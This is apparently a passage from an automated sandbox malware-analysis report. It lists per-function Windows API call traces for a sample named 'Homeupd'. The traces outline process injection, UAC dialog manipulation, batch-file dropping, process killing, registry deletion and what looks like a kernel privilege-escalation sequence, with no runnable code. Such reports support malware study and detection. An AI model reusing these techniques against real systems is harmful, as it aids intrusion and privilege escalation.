      • Part of subcall function 018F2743: CloseHandle.KERNEL32(?), ref: 018F27CB
    • CreateThread.KERNEL32(00000000,00000000,j,00000000), ref: 018F2894
    • CloseHandle.KERNEL32(00000000), ref: 018F289B
    • lstrcatA.KERNEL32(?,018F6804,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 018F28AD
    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 018F28B9
    • lstrcatA.KERNEL32(?,018F6808,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 018F28C7
    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,018F2917), ref: 018F28DF
    • Sleep.KERNEL32(00001388), ref: 018F28F2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F1385: GetModuleHandleA.KERNEL32(kernel32), ref: 018F1398
      • Part of subcall function 018F1385: GetProcAddress.KERNEL32(00000000), ref: 018F139F
      • Part of subcall function 018F3212: LoadLibraryA.KERNEL32(user32.dll), ref: 018F3217
      • Part of subcall function 018F3212: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F3227
      • Part of subcall function 018F3212: GetProcAddress.KERNEL32(00000000), ref: 018F322E
      • Part of subcall function 018F2B31: GetVersionExA.KERNEL32(?), ref: 018F2B4B
      • Part of subcall function 018F2CBE: LoadLibraryA.KERNEL32(ntdll.dll), ref: 018F2CD5
      • Part of subcall function 018F2CBE: GetLastError.KERNEL32(?,00000000), ref: 018F2CE0
      • Part of subcall function 018F2CBE: GetProcAddress.KERNEL32(00000000,ZwQuerySystemInformation), ref: 018F2CF2
      • Part of subcall function 018F2CBE: GetLastError.KERNEL32(?,00000000), ref: 018F2CFD
      • Part of subcall function 018F2CBE: GetProcAddress.KERNEL32(00000000,ZwAllocateVirtualMemory), ref: 018F2D09
      • Part of subcall function 018F2CBE: GetLastError.KERNEL32(?,00000000), ref: 018F2D14
      • Part of subcall function 018F2CBE: LoadLibraryA.KERNEL32(?), ref: 018F2D30
      • Part of subcall function 018F2CBE: GetLastError.KERNEL32(?,00000000), ref: 018F2D38
      • Part of subcall function 018F2CBE: GetProcAddress.KERNEL32(00000000,PsLookupProcessByProcessId), ref: 018F2D44
      • Part of subcall function 018F2CBE: GetCurrentProcessId.KERNEL32 ref: 018F2D4F
      • Part of subcall function 018F2CBE: FreeLibrary.KERNEL32(?), ref: 018F2D67
    • CreateThread.KERNEL32(00000000,00000000,018F30E3,00000000), ref: 018F328F
    • WaitForSingleObject.KERNEL32(00000000,000493E0), ref: 018F32A8
    • TerminateThread.KERNEL32(?,00000000), ref: 018F32B2
    • CreateThread.KERNEL32(00000000,00000000,j,00000000), ref: 018F32F8
    • CloseHandle.KERNEL32(00000000), ref: 018F3301
    • CreateProcessA.KERNEL32(00000000,018F3EC4,00000000,00000000,00000000,00000000,00000000,00000000,00000044,018F3386), ref: 018F3315
    • WaitForSingleObject.KERNEL32(018F3386,0000EA60), ref: 018F3334
    • CloseHandle.KERNEL32(018F3386), ref: 018F3339
    • CloseHandle.KERNEL32(018F3EC4), ref: 018F333E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(00000000), ref: 018F215C
    • VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 018F2175
    • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 018F2187
    • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 018F21AB
    • VirtualProtectEx.KERNEL32(?,018F22DF,00001000,00000040,?), ref: 018F21DD
    • WriteProcessMemory.KERNEL32(?,018F22DF,018F22DF,00001000,?), ref: 018F21ED
    • VirtualQueryEx.KERNEL32(?,018F22DF,?,0000001C), ref: 018F2211
    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 018F2223
    • GetProcAddress.KERNEL32(00000000), ref: 018F222A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F191D: GetTempPathA.KERNEL32(00000104,?), ref: 018F1950
      • Part of subcall function 018F191D: lstrcatA.KERNEL32(?,\..\..\LocalLow\), ref: 018F1962
      • Part of subcall function 018F191D: GetEnvironmentVariableA.KERNEL32(username,?,000000FF), ref: 018F1979
      • Part of subcall function 018F191D: wsprintfA.USER32(00000000,%s\cmd.%s.bat,?,?), ref: 018F1995
    • lstrcpynA.KERNEL32(?,?,00000104,?,00000000), ref: 018F19E9
    • GetModuleHandleA.KERNEL32(00000000), ref: 018F19F3
    • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 018F19FA
    • wsprintfA.USER32(?,start "" "%s",?,?,00000000), ref: 018F1A13
    • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F1A2B
    • GetLastError.KERNEL32 ref: 018F1A38
    • lstrlenA.KERNEL32(?,00000000), ref: 018F1A48
    • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 018F1A5E
    • GetLastError.KERNEL32 ref: 018F1A6D
    • CloseHandle.KERNEL32(00000000), ref: 018F1A76
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • RegisterClassA.USER32(?), ref: 018F3133
    • CreateWindowExA.USER32(00000000,018F6B4C,00000000,00000000,000000FF,000000FF,00000000,00000000,00000000,00000000,00000000,00000000), ref: 018F3149
    • Sleep.KERNEL32(00000190), ref: 018F3161
      • Part of subcall function 018F2F39: GetLastError.KERNEL32(00000000,?,?,?,018F3172,?), ref: 018F2F51
      • Part of subcall function 018F2F39: GetLastError.KERNEL32(00000000,?,?,?,018F3172,?), ref: 018F2F5C
      • Part of subcall function 018F2F39: GetCurrentProcess.KERNEL32 ref: 018F2F6F
      • Part of subcall function 018F2F39: GetLastError.KERNEL32(?,?,018F3172,?), ref: 018F2F8F
    • GetCurrentThreadId.KERNEL32 ref: 018F318E
    • SetWindowsHookExA.USER32(00000004,018F3084,00000000,00000000), ref: 018F3199
    • TrackPopupMenu.USER32(00000000,00000000,FFFFD8F0,FFFFD8F0,00000000,?,00000000), ref: 018F31B1
    • PostMessageA.USER32(?,00000000,00000000,00000000), ref: 018F31C1
    • DestroyWindow.USER32(?), ref: 018F31D4
    • DestroyMenu.USER32(00000000), ref: 018F31DF
    • UnhookWindowsHook.USER32(00000004,018F3084), ref: 018F31E8
    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 018F31FE
      • Part of subcall function 018F2DAF: CreatePopupMenu.USER32 ref: 018F2DE2
      • Part of subcall function 018F2DAF: InsertMenuItemA.USER32(00000000,00000000,00000001,?), ref: 018F2DFA
      • Part of subcall function 018F2DAF: CreatePopupMenu.USER32 ref: 018F2E1F
      • Part of subcall function 018F2DAF: InsertMenuItemA.USER32(00000000,00000000,00000001,?), ref: 018F2E33
      • Part of subcall function 018F2DAF: DestroyMenu.USER32(00000000), ref: 018F2E44
      • Part of subcall function 018F2DAF: DestroyMenu.USER32(00000000), ref: 018F2E4B
      • Part of subcall function 018F2DAF: DestroyMenu.USER32(00000000), ref: 018F2E50
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • CreatePopupMenu.USER32 ref: 018F2DE2
    • InsertMenuItemA.USER32(00000000,00000000,00000001,?), ref: 018F2DFA
    • CreatePopupMenu.USER32 ref: 018F2E1F
    • InsertMenuItemA.USER32(00000000,00000000,00000001,?), ref: 018F2E33
    • DestroyMenu.USER32(00000000), ref: 018F2E44
    • DestroyMenu.USER32(00000000), ref: 018F2E4B
    • DestroyMenu.USER32(00000000), ref: 018F2E50
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetClassNameA.USER32(?,?,00000032), ref: 018F1DA8
    • lstrcmpA.KERNEL32(#32770,00000000), ref: 018F1DBB
    • GetWindowLongA.USER32(?,000000F0), ref: 018F1DCF
    • GetWindowLongA.USER32(?,000000EC), ref: 018F1DDB
    • SetActiveWindow.USER32(?), ref: 018F1DE5
    • GetDlgItem.USER32(?,0000114A), ref: 018F1DF1
    • SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 018F1E05
    • Sleep.KERNEL32(00000064), ref: 018F1E0D
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetCurrentProcess.KERNEL32 ref: 018F15D3
    • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 018F15E0
    • GetTokenInformation.ADVAPI32(?,00000019,00000000,00000000,018F3EB4), ref: 018F1600
    • GetLastError.KERNEL32(?,?,?,?,?,018F3EB4), ref: 018F1606
    • LocalAlloc.KERNEL32(00000000,018F3EB4), ref: 018F1616
    • GetTokenInformation.ADVAPI32(?,00000019,00000000,018F3EB4,018F3EB4), ref: 018F162F
    • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,?,?,018F3EB4), ref: 018F1637
    • GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,?,?,018F3EB4), ref: 018F1647
    • LocalFree.KERNEL32(00000000), ref: 018F167D
    • CloseHandle.KERNEL32(?), ref: 018F1687
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F186F: lstrcpyA.KERNEL32(018F3554,018FF6B8,?,018F189F,018F3554,018FF6B8,?,?,?,018F3554,?), ref: 018F187A
      • Part of subcall function 018F186F: lstrcatA.KERNEL32(018F3554,00000000,?,018F189F,018F3554,018FF6B8,?,?,?,018F3554,?), ref: 018F1889
    • CreateFileA.KERNEL32(018F3554,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F18B1
    • WriteFile.KERNEL32(00000000,018FF400,0000020E,?,00000000), ref: 018F18D5
    • FlushFileBuffers.KERNEL32(00000000), ref: 018F18DE
    • WriteFile.KERNEL32(00000000, RECTEXE,0000006C,?,00000000), ref: 018F190A
    • FlushFileBuffers.KERNEL32(00000000), ref: 018F190D
    • CloseHandle.KERNEL32(00000000), ref: 018F1910
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 018F11C8
    • GetProcAddress.KERNEL32(00000000), ref: 018F11CF
    • RegOpenKeyExA.ADVAPI32(80000002,018F36A0,00000000,00020106,?), ref: 018F11EE
    • RegDeleteKeyA.ADVAPI32(80000002,018F36A0), ref: 018F1215
    • RegCloseKey.ADVAPI32(?), ref: 018F1220
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetTempPathA.KERNEL32(00000104,?), ref: 018F1950
    • lstrcatA.KERNEL32(?,\..\..\LocalLow\), ref: 018F1962
    • GetEnvironmentVariableA.KERNEL32(username,?,000000FF), ref: 018F1979
    • wsprintfA.USER32(00000000,%s\cmd.%s.bat,?,?), ref: 018F1995
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • CreateFileA.KERNEL32(018F3EC4,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 018F275B
    • GetProcessHeap.KERNEL32 ref: 018F2773
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,018F2856,?,018F8000,00005A00,018F3EC4,00000022,?,?,00000000), ref: 018F2776
    • SetFilePointer.KERNEL32(00000022,00000000,00000000,00000000), ref: 018F27A3
    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 018F27B4
    • GetProcessHeap.KERNEL32 ref: 018F27BF
    • HeapFree.KERNEL32(00000000,?,?,00000000), ref: 018F27C2
    • CloseHandle.KERNEL32(?), ref: 018F27CB
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 018F1554
    • Process32First.KERNEL32(00000000,?), ref: 018F156D
    • lstrcmpA.KERNEL32(?,018F26D1,00000000,0000000F,00000000,00000000,00000000), ref: 018F1587
    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 018F159A
    • TerminateProcess.KERNEL32(00000000,00000009), ref: 018F15A9
    • CloseHandle.KERNEL32(00000000), ref: 018F15B0
    • Process32Next.KERNEL32(00000000,00000128), ref: 018F15BA
    • CloseHandle.KERNEL32(00000000), ref: 018F15C5
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F122C: RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,?), ref: 018F1244
      • Part of subcall function 018F122C: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000000), ref: 018F126F
      • Part of subcall function 018F122C: RegCloseKey.ADVAPI32(?), ref: 018F127A
    • Sleep.KERNEL32(00000064), ref: 018F1ABD
    • lstrcmpiA.KERNEL32(?,TRUE,?,?,?,?,?,00000000), ref: 018F1AFB
    Strings
    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\, xrefs: 018F1AA9
    • marker_gjru_fbegrihlgm, xrefs: 018F1AA4
    • TRUE, xrefs: 018F1AEF
    • SOFTWARE\Microsoft\Windows NT\CurrentVersion\, xrefs: 018F1AD6
    • marker_gjru_fbegrihlgm, xrefs: 018F1AD1
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F1385: GetModuleHandleA.KERNEL32(kernel32), ref: 018F1398
      • Part of subcall function 018F1385: GetProcAddress.KERNEL32(00000000), ref: 018F139F
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F2AEB
    • GetProcAddress.KERNEL32(00000000), ref: 018F2AF2
    • GetSystemInfo.KERNEL32(?), ref: 018F2B04
    • GetVersionExA.KERNEL32(0000009C), ref: 018F2B11
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F1385: GetModuleHandleA.KERNEL32(kernel32), ref: 018F1398
      • Part of subcall function 018F1385: GetProcAddress.KERNEL32(00000000), ref: 018F139F
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F2A5C
    • GetProcAddress.KERNEL32(00000000), ref: 018F2A63
    • GetSystemInfo.KERNEL32(?), ref: 018F2A75
    • GetVersionExA.KERNEL32(0000009C), ref: 018F2A82
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F1385: GetModuleHandleA.KERNEL32(kernel32), ref: 018F1398
      • Part of subcall function 018F1385: GetProcAddress.KERNEL32(00000000), ref: 018F139F
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F2099
    • GetProcAddress.KERNEL32(00000000), ref: 018F20A0
    • GetSystemInfo.KERNEL32(?), ref: 018F20B2
    • GetVersionExA.KERNEL32(0000009C), ref: 018F20BF
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetCurrentThreadId.KERNEL32 ref: 018F300F
    • SetWindowsHookExA.USER32(00000009,Function_00002C80,00000000,00000000), ref: 018F3020
    • SendMessageA.USER32(?,00000000,00900516,00000000), ref: 018F3032
    • UnhookWindowsHook.USER32(00000009,Function_00002C80), ref: 018F303B
    • EndMenu.USER32 ref: 018F304B
    • EndMenu.USER32 ref: 018F305F
    • CallWindowProcA.USER32(?,?,?,?), ref: 018F307A
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • LoadLibraryA.KERNEL32(user32.dll), ref: 018F3217
    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 018F3227
    • GetProcAddress.KERNEL32(00000000), ref: 018F322E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • LocalAlloc.KERNEL32(00000040,?), ref: 018F2BF9
    • GetLastError.KERNEL32(?,00000000), ref: 018F2C05
    • StrStrIA.SHLWAPI(00000020,018F69EC), ref: 018F2C33
    • StrStrIA.SHLWAPI(00000020,exe), ref: 018F2C42
    • LocalFree.KERNEL32(00000000), ref: 018F2C72
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(kernel32), ref: 018F14F3
    • GetProcAddress.KERNEL32(00000000), ref: 018F14FA
    • GetCurrentProcess.KERNEL32 ref: 018F1515
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 018F17BF
    • WriteFile.KERNEL32(00000000,?,018F3B8B,?,00000000), ref: 018F17DA
    • FlushFileBuffers.KERNEL32(00000000), ref: 018F17F1
    • CloseHandle.KERNEL32(00000000), ref: 018F17F8
    • GetLastError.KERNEL32(?,?,?,018F3B8B,?,?,00000001,?,80000002), ref: 018F1808
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(kernel32), ref: 018F1398
    • GetProcAddress.KERNEL32(00000000), ref: 018F139F
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • GetClassNameA.USER32(?,?,00000032), ref: 018F1B8B
    • lstrcmpA.KERNEL32($$$Secure UAP,00000000), ref: 018F1B9E
    • SwitchToThisWindow.USER32(?,00000001), ref: 018F1BAD
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 018F12F9
    • Process32FirstW.KERNEL32(00000000,?), ref: 018F1330
    • lstrcmpiW.KERNEL32(?,00000000), ref: 018F1343
    • Process32NextW.KERNEL32(00000000,0000022C), ref: 018F1356
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
    • RegOpenKeyExA.ADVAPI32(018F3EC4,?,00000000,00020119,018F3EC4), ref: 018F293D
    • StrStrIA.SHLWAPI(?,00000000), ref: 018F2961
    • RegEnumKeyA.ADVAPI32(018F3EC4,00000000,?,00000104), ref: 018F297B
    • RegCloseKey.ADVAPI32(018F3EC4), ref: 018F2984
    Memory Dump Source
    • Source File: 00000003.00000002.281653048.018F1000.00000020.sdmp, Offset: 018F0000, based on PE: true
    • Associated: 00000003.00000002.281647801.018F0000.00000002.sdmp
    • Associated: 00000003.00000002.281659353.018F5000.00000002.sdmp
    • Associated: 00000003.00000002.281664813.018F8000.00000004.sdmp
    • Associated: 00000003.00000002.281672336.01901000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_18f0000_Homeupd.jbxd
    APIs
      • Part of subcall function 018F2E5E: LoadLibraryA.KERNEL32(user32.dll), ref: 018F2E6C
      • Part of subcall function 018F2E5E: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 018F2E89
      • Part of subcall function 018F2E5E: GetProcAddress.KERNEL32(00000000,CreateSystemThreads), ref: 018F2E9A
      • Part of subcall function 018F2E5E: FreeLibrary.KERNEL32(00000000), ref: 018F2EFC
    • GetLastError.KERNEL32(00000000,?,?,?,018F3172,?), ref: 018F2F51
    • GetLastError.KERNEL32(00000000,?,?,?,018F3172,?), ref: 018F2F5C
    • GetCurrentProcess.KERNEL32 ref: 018F2F6F
    • GetLastError.KERNEL32(?,?,018F3172,?), ref: 018F2F8F
    Memory Dump Source
